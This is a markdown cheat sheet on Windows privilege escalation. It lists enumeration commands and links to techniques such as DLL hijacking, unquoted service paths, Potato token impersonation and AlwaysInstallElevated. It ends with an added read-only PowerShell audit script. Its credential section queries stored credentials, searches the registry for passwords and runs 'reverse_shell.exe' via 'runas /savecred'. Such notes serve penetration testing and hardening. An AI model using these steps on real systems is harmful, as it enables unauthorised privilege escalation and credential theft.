# Windows Privilege Escalation

## Links

* [Fundamentals](https://www.fuzzysecurity.com/tutorials/16.html)
* [PowerShellEmpire](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp)
* [JAWS](https://github.com/411Hall/JAWS)

## Account Types

* __Administrator__ local & domain
* __Standard__ local & domain
* __Guest__
* __System__

## Enumeration

### Users & Groups

```sh
whoami /priv
net users
net localgroup
query session
qwinsta
```

### Files

* [powershell](../../../../enumeration/windows/powershell.md)

### System

```sh
hostname
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
```

* Installed software

```sh
wmic product get name,version,vendor
```

* Services

```sh
wmic service list brief | findstr "Running"
```

## Exploit

### DLL Hijacking

* [DLL hijacking](../../../../exploit/windows/dll_hijacking/dll_hijacking.md)

### Unquoted Service Path

* [unquoted service path](../../../../exploit/windows/docs/unqoted_path.md)

### Token Impersonation

* `SeImpersonatePrivilege` is necessary, check via `whoami /priv`
* Hot Potato is best before Server 2019 and Windows 10 (version 1809)
* [Potatoes](../../../../exploit/windows/docs/potatoes.md)

### Scheduled Tasks

* `schtasks`
* `Autoruns64.exe`

### MSI Elevated Installer

* [Always install elevated](../../../../exploit/windows/docs/always_installed_elevated.md)

### Search for Credentials

```sh
cmdkey /list
```

* Use found credentials

```sh
runas /savecred /user: reverse_shell.exe
```

* Keys containing passwords

```sh
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
```
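As an added audit example (not part of these notes), the following PowerShell reports two of the misconfigurations listed above, unquoted service paths and the AlwaysInstallElevated installer policy, so an administrator can find and fix them on a host; it only reads, it changes nothing.

```powershell
# Added audit script (not from the original notes). Reports, without changing
# anything, two misconfigurations this page lists: unquoted service binary paths
# and the AlwaysInstallElevated installer policy. Run from an elevated prompt.

function Get-UnquotedServicePath {
    # A binary path that is not wrapped in quotes and contains a space before
    # the executable name is resolved ambiguously by the service control manager.
    Get-CimInstance -ClassName Win32_Service |
        Where-Object {
            $_.PathName -and
            $_.PathName -notmatch '^\s*"' -and
            ($_.PathName -split '\.exe', 2)[0] -match '\s'
        } |
        Select-Object Name, StartName, StartMode, PathName
}

function Test-AlwaysInstallElevated {
    # The policy is only in effect when the value is 1 in BOTH hives;
    # a missing value or 0 in either hive means it is off.
    $paths = @(
        'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer',
        'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
    )
    $set = foreach ($p in $paths) {
        $v = Get-ItemProperty -Path $p -Name AlwaysInstallElevated -ErrorAction SilentlyContinue
        [bool]($v -and $v.AlwaysInstallElevated -eq 1)
    }
    return ($set -notcontains $false)
}

$unquoted = Get-UnquotedServicePath
if ($unquoted) {
    Write-Output 'Services with unquoted paths (quote the ImagePath or move the binary):'
    $unquoted | Format-Table -AutoSize
} else {
    Write-Output 'No unquoted service paths found.'
}

if (Test-AlwaysInstallElevated) {
    Write-Output 'AlwaysInstallElevated is enabled in both hives: set both values to 0.'
} else {
    Write-Output 'AlwaysInstallElevated is not enabled.'
}
```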